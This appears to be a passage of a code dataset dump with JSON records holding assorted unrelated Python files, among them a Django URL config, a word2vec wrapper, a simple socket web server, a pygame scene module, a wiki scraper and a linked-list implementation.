for every row in the results table following\n # the supplied template string formatting\n for result in results:\n output += \"{: ^80}\\n\".format(template.format(result[0], result[1]))\n\n # Put it all together and print it\n print(output.format(\"\", title.upper()))\n\n\ndef processQuery(cursor, query, extras=None):\n # Execute query with any constraints (extras) such as 3 for LIMIT 3\n cursor.execute(query.string, extras)\n cursor.connection.commit()\n\n printResults(query.title, cursor.fetchall(), query.template)\n\n\ndef main():\n conn = psycopg2.connect(database=\"news\")\n cursor = conn.cursor()\n\n processQuery(cursor, qTopArticles, [3]) # Limit 3\n processQuery(cursor, qTopAuthors)\n processQuery(cursor, qBadRequests, [0.01]) # Threshold of 1%\n\n cursor.close()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"302870105","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom .views import index_view, page_view, rating_page_view, search_page_view, search_with_filter_page_view, time_page_view\nfrom recipes.views import recipe_detail_view\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', index_view, name='index'),\n path('pages/', page_view, name='page'),\n path('recipe//', recipe_detail_view, name='recipe'),\n path('search/&&/', search_page_view, name='search'),\n path('filter/time/&&/', time_page_view, name='time_filter'),\n path('popular//', rating_page_view, name='rating_filter'),\n path('search/filter/&&&&/', search_with_filter_page_view, name='search_with_filter'),\n]\n","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306867232","text":"import numpy as np\nfrom tqdm import tqdm\nimport _pickle as pickle\nfrom scipy.spatial.distance import cosine\nfrom sklearn.neighbors import NearestNeighbors\n\nclass Word2VecModel:\n # word index must start from 1\n # word with idx=0 is empty word, which always has zero embedding\n def __init__(self, word2idx, idx2word, idx2emb):\n self._word2idx, self.idx2word, self.idx2emb = word2idx, idx2word, idx2emb\n if not all(v == 0 for v in self.idx2emb[0]):\n raise Exception('Embedding at idx = 0 must be all 0')\n self._neigh = None\n \n def summary(self):\n print(self)\n \n def __repr__(self):\n summary = f'Number of vocabularies: {self.n_vocabs} \\n'\n summary += f'Number of embedding factors: {self.n_embfactors} \\n'\n return summary\n \n @property\n def n_embfactors(self):\n return self.idx2emb.shape[1]\n \n @property\n def n_vocabs(self):\n return self.idx2emb.shape[0]\n \n @property\n def emb_mat(self):\n return self.idx2emb\n \n @classmethod\n def from_fasttext_vec(cls, fname):\n with open(fname, encoding=\"utf-8\") as f:\n nwords, nfeatures = [int(num) for num in f.readline().split()]\n nwords = nwords + 1 #Add empty word at idx 0\n idx2emb = np.zeros((nwords, nfeatures))\n idx2word = [None]*nwords\n word2idx = {}\n for i in tqdm(range(1, nwords)):\n try:\n line = f.readline().strip()\n word, emb = line.split(' ',maxsplit=1)\n emb_vec = [float(num) for num in emb.split()]\n if len(emb_vec) != nfeatures:\n print(f'Error while reading word {i}, parsed word: {word} ')\n continue\n word2idx[word] = i\n idx2word[i] = word\n idx2emb[i,:] = emb_vec\n except Exception as ex:\n print(ex)\n return cls(word2idx, idx2word, idx2emb)\n \n @classmethod\n def from_pickle(cls, fname):\n word2idx, idx2word, idx2emb = pickle.load( open( fname, \"rb\" ) )\n return cls(word2idx, idx2word, idx2emb)\n \n def save(self, fname):\n pickle.dump( (self.word2idx, self.idx2word, self.idx2emb), open( fname, \"wb\" ))\n\n #Maybe improve by splitting unknown word to 2 known words\n def word2emb(self, word):\n if word in self._word2idx:\n return self.idx2emb[self._word2idx[word]]\n else:\n raise NotImplemented\n \n def word2idx(self, word):\n if word in self._word2idx:\n return self._word2idx[word]\n else:\n return -1\n \n def idx2word(self, idx):\n return self.idx2word(idx)\n \n def dist(self, word1, word2):\n emb1 = self.word2emb(word1)\n emb2 = self.word2emb(word2)\n return self.emb_dist(emb1, emb2)\n \n def emb_dist(self, emb1, emb2):\n return cosine(emb1, emb2)\n \n def neighbors(self, word, k=10):\n if self._neigh is None:\n self._neigh = NearestNeighbors(n_neighbors=k, radius=0.5, metric='cosine', algorithm='brute')\n self._neigh.fit(self._idx2emb)\n distances, indices = self._neigh.kneighbors([self.word2emb(word)], n_neighbors=k)\n return [(self.idx2word[int(ind)], dist) for ind, dist in zip(list(indices[0]), list(distances[0]))]","sub_path":"courses/nik/niklib/w2v_model.py","file_name":"w2v_model.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"177118537","text":"import matplotlib.pyplot as plt\nimport sys\nimport json\n\n\ndef read_from_file(path_to_file, overlap_from=None, overlap_till=None):\n f = open(path_to_file).read()\n txt = \"[\" + f.replace(\"}{\", \"},\\n{\") + \"]\"\n test_result = json.loads(txt)\n medians = []\n averages = []\n ovelaps = []\n for step in test_result:\n if overlap_from is not None and step[\"overlap\"] < overlap_from:\n continue\n if overlap_till is not None and step[\"overlap\"] > overlap_till:\n break\n medians.append(step[\"total_median\"])\n averages.append(step[\"total_average\"])\n ovelaps.append(step[\"overlap\"])\n return medians, averages, ovelaps\n\ndef comparison(d_o, v_o, d_m, v_m, d_a, v_a, file_name, desc=\"simple\"):\n m_dif = []\n a_dif = []\n if len(d_o) < len(v_o):\n v_o = v_o[0:len(d_o)]\n\n for i in range(len(v_o)):\n m_dif.append(d_m[i] - v_m[i])\n a_dif.append(d_a[i] - v_a[i])\n\n plt.figure(3)\n\n l1, l2 = plt.plot(v_o, m_dif, 'r^-', v_o, a_dif, 'g^-')\n\n plt.legend((l1, l2), (u'Median', u'Average'), loc=\"upper center\")\n\n plt.xlabel('Overlap')\n\n plt.ylabel('Difference between Docker perfomance and Docker in VM perfomance')\n\n plt.title(desc)\n\n plt.grid(True)\n\n plt.savefig(file_name + \"_difference.png\", dpi=300)\n\ndef real_graphic(d_o, v_o, d_m, v_m, d_a, v_a, file_name):\n plt.figure(1)\n\n line1, line2 = plt.plot(d_o, d_m, 'bD:', v_o, v_m, 'go:')\n\n plt.legend((line1, line2),\n (u'Results for containers', u'Results for containers in VM'), loc=\"upper center\")\n\n plt.xlabel('Overlap')\n\n plt.ylabel('Perfomance (median)')\n\n plt.grid(True)\n\n plt.savefig(file_name + \"_median.png\", dpi=300)\n\n plt.figure(2)\n\n line1, line2 = plt.plot(d_o, d_a, 'bD:', v_o, v_a, 'go:')\n\n plt.legend((line1, line2),\n (u'Results for containers', u'Results for containers in VM'), loc=\"upper center\")\n\n plt.xlabel('Overlap')\n\n plt.ylabel('Perfomance (average)')\n\n plt.grid(True)\n\n plt.savefig(file_name + \"_average.png\", dpi=300)\n\n\n\nif __name__ == \"__main__\":\n path_to_docker = sys.argv[1]\n path_to_kvm = sys.argv[2]\n # path_to_dockerinvm = sys.argv[3]\n # desc = sys.argv[4]\n desc = sys.argv[3]\n file_name = sys.argv[4]\n\n if len(sys.argv) > 5:\n overlap_from = float(sys.argv[5])\n overlap_till = float(sys.argv[6])\n else:\n overlap_till = None\n overlap_from = None\n\n d_ms, d_as, d_os = read_from_file(path_to_docker, overlap_from, overlap_till)\n\n v_ms, v_as, v_os = read_from_file(path_to_kvm, overlap_from, overlap_till)\n\n\n real_graphic(d_os, v_os, d_ms, v_ms, d_as, v_as, file_name)\n\n comparison(d_os, v_os, d_ms, v_ms, d_as, v_as, file_name, desc)","sub_path":"visual_ddvm.py","file_name":"visual_ddvm.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"228659441","text":"import socket\nimport re\nimport multiprocessing\n\nclass WSGIServer(object):\n \"\"\"WSGI服务器类\"\"\"\n def __init__(self):\n # 1. 创建套接字\n self.tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # 设定套接字选项, 可以重复使用地址\n self.tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # 2. 绑定 \n self.tcp_server_socket.bind((\"\", 7890))\n\n # 3. 监听\n self.tcp_server_socket.listen(128)\n \n \n def service_client(self, tcp_client_socket):\n \"\"\"为客户端服务\"\"\"\n\n # 1. 接收浏览器发送过来的 http 请求\n # GET /index.html HTTP/1.1\n # ......\n # \n # 请求数据内容,对数据内容进行解码\n request = tcp_client_socket.recv(1024).decode(\"utf-8\")\n print(request)\n\n try:\n # 对接收到的请求协议字符串进行按行切割\n # 返回的是由每一行组成的一个列表\n request_lines = request.splitlines()\n\n # 第一行就是http请求头,其中有浏览器需要访问的文件名\n ret = re.match(r\"[^/]+(/[^ ]*)\", request_lines[0])\n # 获取文件名 /index.html\n if ret:\n file_name = ret.group(1)\n if file_name == \"/\":\n file_name = \"/index.html\"\n else:\n pass\n\n except IndexError:\n pass\n\n # 2.返回http格式的数据给浏览器\n try:\n f = open(\"./html\" + file_name, \"rb\")\n except:\n response = \"HTTP/1.1 404 NOT FOUND\\r\\n\"\n response += \"\\r\\n\"\n response += \"------file not found------\"\n tcp_client_socket.send(response.encode(\"utf-8\"))\n else:\n html_content = f.read()\n f.close()\n # 2.1 发给浏览器的数据----header\n # 注意末尾换行一定要加上\\r\\n 表示换行 \n response = \"HTTP/1.1 200 OK\\r\\n\"\n response += \"\\r\\n\" # 在协议头和 请求的数据之间有一个空行\n\n # 2.2 发给浏览器的数据----body \n # response += \"

YangHang love ZhangZifan

\"\n \n # 发送回应头\n tcp_client_socket.send(response.encode(\"utf-8\"))\n # 发送客户端请求的内容\n tcp_client_socket.send(html_content) \n \n # 关闭服务套接字\n tcp_client_socket.close()\n\n def run_forever(self):\n \"\"\"完成服务器的整体控制,无限循环运行\"\"\" \n while True:\n # 4. 等待新客户端的连接\n new_socket, client_addr = self.tcp_server_socket.accept()\n\n # 5. 创建一个子进程为这个客户端服务\n p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))\n p.start() \n \n # 关闭父进程中的 new_socket \n new_socket.close()\n\n # 关闭监听套接字\n self.tcp_server_socket.close()\n\ndef main():\n \"\"\"控制整体,创建一个web服务器对象,然后调用这个对象的run_forever方法运行\"\"\"\n wsgi_server = WSGIServer()\n wsgi_server.run_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"07-mini-web框架/01-多进程-面向对象-web服务器/web_server.py","file_name":"web_server.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"340813681","text":"import os\nfrom abc import ABCMeta, abstractmethod\n\nimport pygame\n\nfrom const.button import DEFAULT_H, DEFAULT_W\nfrom const.color import WHITE\nfrom const.event import ENEMY_TOUCH, TURN_END, BATTLE_END_POST, REGEN_POST\nfrom const.panel import BUT1_POS, BUT2_POS, DEFAULT_NAME, DEFAULT_EXP, DEFAULT_LABEL\nfrom const.screen import DEFAULT_SIZE\nfrom engine.button import Button\nfrom engine.label import Label\nfrom loading import load_enemy\nfrom units.enemy import create_enemy\nfrom units.gang import Gang\nfrom units.unit import create_hero\n\n\nclass Scene(metaclass=ABCMeta):\n def __init__(self, image, screen_size, scene_config):\n self._config = scene_config\n self._image = pygame.image.load(image).convert_alpha()\n self._image = pygame.transform.scale(self._image, screen_size)\n self._rect = self._image.get_rect()\n\n @property\n def rect(self):\n return self._rect\n\n @property\n @abstractmethod\n def is_over(self):\n pass\n\n\nclass Battle(Scene):\n def __init__(self, screen_size, scene_config, hero_config):\n image_path = os.path.join('pictures', 'BG', scene_config['image'])\n Scene.__init__(self, image_path, screen_size, scene_config)\n self._turn_hero = True\n self._enemies = [create_enemy(load_enemy(enemy), screen_size[0]) for enemy in scene_config['enemies']]\n self._enemies = Gang(self._enemies, screen_size)\n self._hero = create_hero(hero_config, screen_size)\n self._hero.move_to(int(screen_size[1] * 0.05), int(screen_size[1] * 0.35))\n h = int(DEFAULT_H * screen_size[1] / DEFAULT_SIZE[1])\n w = int(DEFAULT_W * screen_size[0] / DEFAULT_SIZE[0])\n self._button = Button((w, h), (int(0.05 * screen_size[0]), int(0.3 * screen_size[1])), \"Конец хода\", TURN_END)\n\n def update(self):\n self._enemies.animated()\n self._hero.animated()\n self._enemies.dead()\n if self._turn_hero:\n self._hero.hand.hover(pygame.mouse.get_pos())\n else:\n self._enemies.attack(self._hero)\n if len(self._enemies) == 0:\n pygame.event.post(BATTLE_END_POST)\n\n def blit_me(self, surface):\n surface.blit(self._image, self._rect)\n self._hero.blit_me(surface)\n self._enemies.blit_me(surface)\n if self._turn_hero:\n self._button.blit_me(surface)\n\n def click(self, xy):\n self._enemies.click(xy)\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN and self._turn_hero:\n self.click(event.pos)\n self._hero.hand.click(event.pos)\n self._button.handle_event(event)\n if self._hero.rect.collidepoint(event.pos) \\\n and self._hero.hand._selected_card is not None \\\n and self._hero.hand._selected_card.subtype in ('regen', 'effect'):\n self._hero.action_card(self._hero._hand._selected_card)\n pygame.event.post(REGEN_POST)\n\n elif event.type == ENEMY_TOUCH:\n if self._hero.hand._selected_card is not None and self._hero.hand._selected_card.subtype not in (\n 'regen', 'effect'):\n self._hero.attack(self._enemies._active, self._hero._hand._selected_card)\n elif event.type == TURN_END:\n self._turn_hero = not self._turn_hero\n if not self._turn_hero:\n self._enemies.attack_init()\n self._hero.update_effect()\n else:\n self._hero.regen()\n self._hero.update_hand()\n pygame.event.post(REGEN_POST)\n else:\n pass # TODO\n\n @property\n def is_over(self):\n pass\n\n @property\n def hero_info(self):\n return self._hero.get_info()\n\n\nclass Quest(Scene):\n def __init__(self, screen_size, scene_config):\n image_path = os.path.join('pictures', 'blueframe2.png')\n Scene.__init__(self, image_path, screen_size, scene_config)\n self._exp = scene_config[\"exp\"]\n self._name = scene_config[\"name\"]\n self._buttons = []\n trans_x = screen_size[0] / DEFAULT_SIZE[0]\n trans_y = screen_size[1] / DEFAULT_SIZE[1]\n but1_pos = (int(BUT1_POS[0] * trans_x), int(BUT1_POS[1] * trans_y))\n but2_pos = (int(BUT2_POS[0] * trans_x), int(BUT2_POS[1] * trans_y))\n but_size = (int(DEFAULT_W * trans_x), int(DEFAULT_H * trans_y))\n self._buttons.append(\n Button(but_size, but1_pos, scene_config[\"buttons\"][0][\"text\"], scene_config[\"buttons\"][0][\"on_click\"]))\n self._buttons.append(\n Button(but_size, but2_pos, scene_config[\"buttons\"][1][\"text\"], scene_config[\"buttons\"][1][\"on_click\"]))\n lab_pos = (int(DEFAULT_LABEL[0] * trans_x), int(DEFAULT_LABEL[1] * trans_y))\n lab_size = (int(DEFAULT_LABEL[2] * trans_x), int(DEFAULT_LABEL[3] * trans_y))\n self._label = Label(scene_config[\"text\"], pos=lab_pos, size=lab_size, font_name='fonts/PhillippScript.ttf',\n color=WHITE)\n self._lab_name = Label(text=self._name, pos=(DEFAULT_NAME[0], DEFAULT_NAME[1]),\n size=(DEFAULT_NAME[2], DEFAULT_NAME[3]), color=WHITE,\n font_name='fonts/PhillippScript.ttf')\n self._lab_exp = Label(text='Опыт за квест: {}'.format(self._exp), pos=(DEFAULT_EXP[0], DEFAULT_EXP[1]),\n size=(DEFAULT_EXP[2], DEFAULT_EXP[3]), color=WHITE, font_name='fonts/PhillippScript.ttf')\n\n def update(self):\n pass\n\n def blit_me(self, surface):\n self._lab_name.blit_me(self._image)\n self._label.blit_me(self._image)\n self._lab_exp.blit_me(self._image)\n for button in self._buttons:\n button.blit_me(self._image)\n surface.blit(self._image, self._rect)\n\n def handle_event(self, event):\n for button in self._buttons:\n button.handle_event(event)\n # TODO\n\n @property\n def is_over(self):\n pass\n\n\nclass Upgrade(Scene):\n def __init__(self, screen_size, scene_config):\n image_path = os.path.join('pictures', 'pergament.png')\n Scene.__init__(self, image_path, screen_size, scene_config)\n image_path = os.path.join('pictures', 'flamer.png')\n image = pygame.image.load(image_path).convert_alpha()\n size = int(0.05 * screen_size[0])\n image = pygame.transform.scale(image, (size, size))\n x = int(0.15 * screen_size[0])\n y = int(0.15 * screen_size[1])\n self._image.blit(image, (x, y))\n image_path = os.path.join('pictures', 'drop.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.35 * screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'stone-tablet.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.55 * screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'tornado.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.75 * screen_size[1])\n self._image.blit(image, (x, y))\n\n x = int(0.55 * screen_size[0])\n image_path = os.path.join('pictures', 'swords-power.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.15 * screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'fist.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.35 * screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'archer.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.55 * screen_size[1])\n self._image.blit(image, (x, y))\n\n @property\n def is_over(self):\n pass\n\n def blit_me(self, surface):\n surface.blit(self._image, self._rect)\n\n def handle_event(self, event):\n pass\n\n def update(self):\n pass\n\n\ndef create_scene(screen_size, scene_config, hero_config=None):\n if scene_config['type'] == 'quest':\n return Quest(screen_size, scene_config)\n elif scene_config['type'] == 'battle':\n return Battle(screen_size, scene_config, hero_config)\n elif scene_config['type'] == 'upgrade':\n return Upgrade(screen_size, scene_config)\n else:\n raise ValueError('Scene has unknown type.')\n\n\ndef add_exp(hero, quest_config):\n hero.exp += quest_config[\"_exp\"]\n if hero.new_level:\n hero.level_up()\n","sub_path":"scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292666415","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport html\nimport os\nimport re\n\nimport pandas as pd\nimport requests\nfrom prettyprinter import cpprint\n\ntarget_url = \"http://scp-jp.wikidot.com/guide-hub\"\nstart_word = '

先ずはこれを読んでください

'\nend_word = '
'\n\n\ndef guide_hub():\n response = requests.get(target_url)\n if response.status_code is not requests.codes.ok:\n print(f\"\\trequest err : {response.status_code}\")\n\n masterpath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n lines = response.text.split(\"\\n\")\n start = lines.index(start_word)\n\n df = pd.DataFrame(columns=['url', 'title', 'description'])\n\n urls = []\n titles = []\n descriptions = []\n\n for line in lines[start:]:\n\n line = html.unescape(line)\n\n if end_word in line:\n break\n\n if 'href' in line:\n sp_line = re.split(r'[<>]', line)\n # 要改善\n for i, sp in enumerate(sp_line):\n if 'href' in sp:\n if 'newpage' in sp_line[i]:\n url = sp_line[i].replace(\n 'a class=\"newpage\" href=', \"\").replace(\n '\"', \"\")\n else:\n url = sp_line[i].replace(\n 'a href=', \"\").replace(\n '\"', \"\")\n urls.append(url)\n titles.append(sp_line[i + 1])\n descriptions.append(sp_line[i + 5].replace(\": \", ''))\n break\n\n df['url'] = urls\n df['title'] = titles\n df['description'] = descriptions\n\n df.to_csv(masterpath + \"/data/guide_hub.csv\", header=True, encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n print(\"菖蒲:ガイドハブデータベースの更新を開始します。\")\n\n guide_hub()\n\n print(\"菖蒲:ガイドハブデータベースの更新、完了しました。\")\n","sub_path":"ayame/guidehub.py","file_name":"guidehub.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"421276945","text":"def integerCubeRootHelper(n, left, right):\n cube = lambda x: x * x * x # anonymous function to cube a number\n # assert(n >= 1)\n # assert(left < right)\n # assert(left >= 0)\n # assert(right < n)\n # assert(cube(left) < n), f'{left}, {right}'\n # assert(cube(right) > n), f'{left}, {right}'\n mid = (left+right)//2\n print(mid)\n while mid!=left and cube(mid) !=n:\n if cube(mid) >n:\n right = mid\n else:\n left = mid\n mid = (left+right)//2\n return mid\n\n\n\n\ndef integerCubeRoot(n):\n # assert( n > 0)\n if (n == 1):\n return 1\n if (n == 2):\n return 1\n return integerCubeRootHelper(n, 0, n-1)\n\nif __name__ == '__main__':\n print(integerCubeRoot(26))","sub_path":"cuberoot.py","file_name":"cuberoot.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"369565268","text":"from automator import Automator\nfrom prop import END\n\nimport sys\nfrom termios import tcflush, TCIFLUSH\nfrom multiprocessing import Process, Queue\n\nKEYBOARD = Queue()\n\n\ndef main(kb):\n # 连接 adb 。\n instance = Automator('emulator-5554', kb)\n\n # 启动脚本。\n instance.start()\n\n\nif __name__ == '__main__':\n p = Process(target=main, args=(KEYBOARD,))\n p.start()\n while True:\n tcflush(sys.stdin, TCIFLUSH)\n txt = input()\n if txt == END:\n KEYBOARD.put(txt)\n break\n else:\n KEYBOARD.put('')\n p.join()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"498027738","text":"# -*- coding: utf-8 -*-\n\n\nclass Node:\n def __init__(self, value, next_node=None):\n self.data = value\n self.next_node = next_node\n\n\nclass SingleLinkedList:\n\n def __init__(self):\n '''\n 链表初始化\n '''\n self._head = None\n\n def insert_to_head(self, value: int):\n '''\n 在链表头部插入一个值为data的节点\n :param value:\n :return:\n '''\n new_node = Node(value=value)\n new_node.next_node = self._head\n self._head = new_node\n\n def insert_node_after(self, node, value: int):\n\n '''\n 在指定节点后插入新节点\n :param node:\n :param value:\n :return:\n '''\n\n if node is None: # 如果指定在一个空节点之后插入数据节点,则什么都不做\n return\n\n new_node = Node(value)\n new_node.next_node = node.next_node\n node.next_node = new_node\n\n def insert_node_before(self, node: Node, value: int):\n '''\n 在指定节点前插入新节点\n :param node: 指定的节点 (假设其一定存在)\n :param value: 新节点的值\n :return:\n '''\n\n # if self._head is None: # 空链表\n # if node is None: # 指定节点也为空,可认为是在头结点前插入\n # self.insert_to_head(value)\n # # 如果指定节点不为空,但是链表为空,则不处理,直接跳出\n # return\n # # 需要找到node的上一个节点\n #\n # pre = self._head\n # new_node = Node(value)\n # not_found = False\n # while pre.next_node != node:\n # if pre.next_node is None: # 已到链尾\n # not_found = True\n # break\n # else:\n # pre = pre.next_node\n #\n # if not not_found:\n # new_node.next_node = node\n # pre.next_node = new_node\n dummy = Node(None)\n dummy.next_node = self._head\n pre = dummy\n current = pre.next_node\n while current != node and current is not None:\n pre = current\n current = current.next_node\n\n if current == node:\n new_node = Node(value)\n new_node.next_node = node\n pre.next_node = new_node\n self._head = dummy.next_node\n\n def delete_by_value(self, value: int):\n '''\n 删除结点中“值等于某个给定值”的结点\n :param value:\n :return:\n '''\n if self._head is None: # 空链表则什么都不做\n return\n\n if self._head.data == value: # 头结点就是待删除的点\n self._head = None\n return\n pre = self._head\n node = pre.next_node\n not_found = False\n while node.data != value:\n if node.next_node is None: # 到达链尾\n break\n else:\n\n pre = node\n node = node.next_node\n if not not_found: # 找到待删除的节点\n pre.next_node = node.next_node\n\n def delete_by_node(self, node: Node):\n '''\n 删除给定指针指向的结点\n :param node:\n :return:\n '''\n if self._head is None or node is None:\n return\n\n pre = self._head\n\n while pre.next_node and pre.next_node != node:\n pre = pre.next_node\n\n if pre.next_node:\n pre.next_node = node.next_node\n\n def delete_last_n_node(self, n):\n '''\n 删除链表中倒数第n个节点,假设N<=链表长度\n\n 利用哨兵简化边界条件\n 设置快、慢两个指针,快指针先行,慢指针不动;\n 当快指针跨了N步以后,快、慢指针同时往链表尾部移动,\n 当快指针到达链表尾部的时候,慢指针所指向的就是链表的倒数第N个节点的前一个节点\n\n :param n:\n :return:\n '''\n\n dummy = Node(None)\n dummy.next_node = self._head\n\n first = dummy\n second = dummy\n\n for _ in range(n):\n first = first.next_node\n\n while first.next_node:\n first = first.next_node\n second = second.next_node\n\n second.next_node = second.next_node.next_node\n self._head = dummy.next_node\n #\n # if n <= 0:\n # print('n必须大于0')\n # return\n #\n # if self._head is None:\n # print('空链表。什么都不做')\n # return\n #\n # first = self._head\n # second = self._head\n #\n # for _ in range(n):\n # first = first.next_node\n #\n # if first is None: # 即要删除的是正数第一个节点,直接将head指向head的下一个节点即可\n # self._head = self._head.next_node\n # return\n #\n # while first.next_node:\n # first = first.next_node\n # second = second.next_node\n #\n # # 此时first指向倒数第一个节点,假设链表长度为m,则此时first指向第m个节点的前一个节点,\n # # second指向第m-n个节点的前一个节点,也即倒数第m-(m-n)个节点也就是倒数第n个节点的前一个节点\n # # 为了删除倒数第n个节点,则只需将second的下一个节点指向下下个节点\n #\n # second.next_node = second.next_node.next_node\n # return\n\n def find_mid_node(self):\n '''\n 查找链表中的中间节点.\n 设置快、慢两种指针,快指针每次跨两步,慢指针每次跨一步,则当快指针到达链表尾部的时候,慢指针指向链表的中间节点\n :return: 如果,链表长度为奇数,则返回的是链表的中间节点,偶数则是后半部分的第一个节点\n '''\n fast = self._head\n slow = self._head\n\n while fast.next_node is not None:\n fast = fast.next_node.next_node\n slow = slow.next_node\n\n return slow\n\n def find_by_value(self, value: int):\n '''\n 根据value查找对应的第一个节点\n :param value:\n :return:\n '''\n p = self._head\n while p and p.data != value:\n p = p.next_node\n return p\n\n def find_by_index(self, index: int):\n '''\n 根据索引查找对应节点\n :param index:\n :return:\n '''\n p = self._head\n pos = 0\n while p and pos != index:\n p = p.next_node\n pos += 1\n return p\n\n def print_all(self):\n '''\n 打印当前链表中所有节点的数据\n :return:\n '''\n\n pos = self._head\n if pos is None:\n print('链表为空')\n return\n while pos.next_node:\n print(f'{pos.data}-->', end=\"\")\n pos = pos.next_node\n print(pos.data)\n\n def have_ring(self):\n '''\n 检验链表中是否有环\n 设置快、慢两种指针,快指针每次跨两步,慢指针每次跨一步,如果快指针没有与慢指针相遇而是顺利到达链表尾部\n 说明没有环;否则,存在环\n :return:\n '''\n fast = self._head\n slow = self._head\n\n while (fast is not None) and (fast.next_node is not None): # 空链表和单个节点的链表肯定不成环\n fast = fast.next_node.next_node\n slow = slow.next_node\n if fast == slow:\n return True\n return False\n\n def reverse(self):\n \"\"\"单链表反转.\"\"\"\n if self._head is None or self._head.next_node is None: # 如果链表为空,或者链表只有一个节点\n return\n\n pre = self._head\n node = self._head.next_node\n while node is not None: # 条件终止时,pre是最后一个非空节点\n pre, node = self.__reversed_with_two_node(pre, node)\n\n self._head.next_node = None # 将原头结点位置(此时已反转方向,应该指向空)的下一个节点指向空\n self._head = pre # 因为此时pre为反转后的头节点,故头结点指向pre\n\n @property\n def head_node(self):\n return self._head\n\n def __reversed_with_two_node(self, pre, node):\n '''\n 翻转相邻两个节点\n :param pre: 前一个节点\n :param node: 当前节点\n :return: (pre,node) 下一个相邻节点的元组\n '''\n tmp = node.next_node\n node.next_node = pre\n pre = node\n node = tmp\n return pre, node\n\n @staticmethod\n def merge_sorted_list(l1: Node, l2: Node):\n '''\n 有序链表合并\n :param p1: 有序链表1的头结点\n :param p2: 有序链表2的头结点\n :return:\n '''\n p1, p2 = l1, l2\n dummy = Node(None)\n current = dummy\n while p1 and p2:\n if p1.data <= p2.data:\n current.next_node = p1\n p1 = p1.next_node\n else:\n current.next_node = p2\n p2 = p2.next_node\n current = current.next_node\n current.next_node = p1 if p1 else p2\n return dummy.next_node\n\n\nif __name__ == \"__main__\":\n l1 = SingleLinkedList()\n l1.insert_to_head(4)\n l1.insert_to_head(2)\n l1.insert_to_head(1)\n\n l1.print_all()\n node2 = l1.find_by_index(1)\n l1.insert_node_before(node2, 3)\n l1.print_all()\n\n l2 = SingleLinkedList()\n l2.insert_to_head(4)\n l2.insert_to_head(3)\n l2.insert_to_head(1)\n\n l2.print_all()\n\n l3_head = SingleLinkedList.merge_sorted_list(l1.head_node, l2.head_node)\n current = l3_head\n node_data_list = []\n while current:\n node_data_list.append(str(current.data))\n current = current.next_node\n print('-->'.join(node_data_list))\n\n l4 = SingleLinkedList()\n for i in range(4):\n l4.insert_to_head(i)\n\n l4.print_all()\n print(l4.have_ring())\n node3 = l4.find_by_index(0)\n node0 = l4.find_by_value(0)\n node0.next_node = node3 # 成环\n print(l4.have_ring())\n","sub_path":"python/02_linkedlist/single_linked_list.py","file_name":"single_linked_list.py","file_ext":"py","file_size_in_byte":10238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"334138952","text":"\"\"\"Determine the fration of non-built-up land area needed to become autarkic.\"\"\"\nimport click\nimport pandas as pd\n\nfrom src.potentials import Potential\n\n\n@click.command()\n@click.argument(\"path_to_demand\")\n@click.argument(\"path_to_potential\")\n@click.argument(\"path_to_footprint\")\n@click.argument(\"path_to_built_up_area\")\n@click.argument(\"path_to_output\")\n@click.argument(\"share_from_pv\", type=click.INT)\ndef necessary_land(path_to_demand, path_to_potential, path_to_footprint, path_to_built_up_area,\n path_to_output, share_from_pv=100):\n \"\"\"Determine the fraction of non-built-up land area needed to become autarkic.\n\n Can vary the share of demand satisfied by rooftop PV.\n\n Ignores offshore as it distorts total area sizes.\n \"\"\"\n assert share_from_pv <= 100\n assert share_from_pv >= 0\n share_from_pv = 